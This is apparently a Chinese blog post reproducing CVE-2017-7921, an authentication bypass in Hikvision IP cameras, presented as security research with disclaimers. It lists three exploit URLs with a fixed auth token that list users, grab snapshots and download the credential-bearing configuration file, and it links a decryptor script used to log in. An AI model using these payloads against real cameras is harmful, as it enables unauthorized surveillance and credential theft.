海康威视未授权访问漏洞 (CVE-2017-7921)复现研究

前言:本文内容仅供学习参考及处置建议,文章内容不涉及任何以破坏为目的的犯罪行为,敏感信息已经过脱敏处理,请勿将本文内容用于违法犯罪活动!

一、发现摄像头

(略)

二、构造payload测试

以下是可能存在漏洞的登录页面样式,经供参考。

复制代码
1.http://[摄像头IP]/Security/users?auth=YWRtaW46MTEK 获取用户 
2.http://[摄像头IP]/onvif-http/snapshot?auth=YWRtaW46MTEK 拍摄快照而不进行身份验证 
3.http://[摄像头IP]/System/configurationFile?auth=YWRtaW46MTEK 下载配置文件(该文件包含用户名密码等关键信息)

构造第一条语句,看到用户admin:

构造第二条语句,拍摄快照:

构造第三条语句,下载配置文件;

三、解密配置文件获取用户名密码

拿到用户名密码,登录成功。

解密脚本地址:

https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

声明:本文档仅供安全研究与学习交流使用,切勿用于非法渗透测试或未授权攻击。

相关推荐
技术不好的崎鸣同学4 小时前
[ACTF2020 新生赛]Exec 思路及解法
算法·安全·web安全
MartinYeung512 小时前
[论文学习]SecureGate:通过令牌级门控学习何时安全地揭示PII-深度解析
学习·安全
广州市顺风搬家服务有限公司13 小时前
实验室搬迁科普专业流程防护标准与合规核心要点
网络·其他·安全
Xi-Xu13 小时前
什么时候需要 Multi-agent:不是分工,而是运行边界
人工智能·经验分享·安全
2501_9437823516 小时前
【共创季稿事节】密码生成器:如何构建一个安全的随机密码生成工具
android·数据库·安全·鸿蒙·鸿蒙系统
轩渃16 小时前
Claude Fable5回归即翻车:跑分暴跌、安全拦截、账单猫腻,AI模型的信任危机
人工智能·安全·回归
Chockmans17 小时前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
风控PM说19 小时前
入门第二课:业务催生风险,常见的业务风险有哪些?
安全
独守一片天1 天前
HarmonyOS 6.1.0 Call Service 来电识别与安全通信怎么设计?
安全·华为·harmonyos
想你依然心痛2 天前
嵌入式C代码规范:MISRA-C 2012核心规则解读——类型安全与未定义行为深度剖析
c语言·安全·代码规范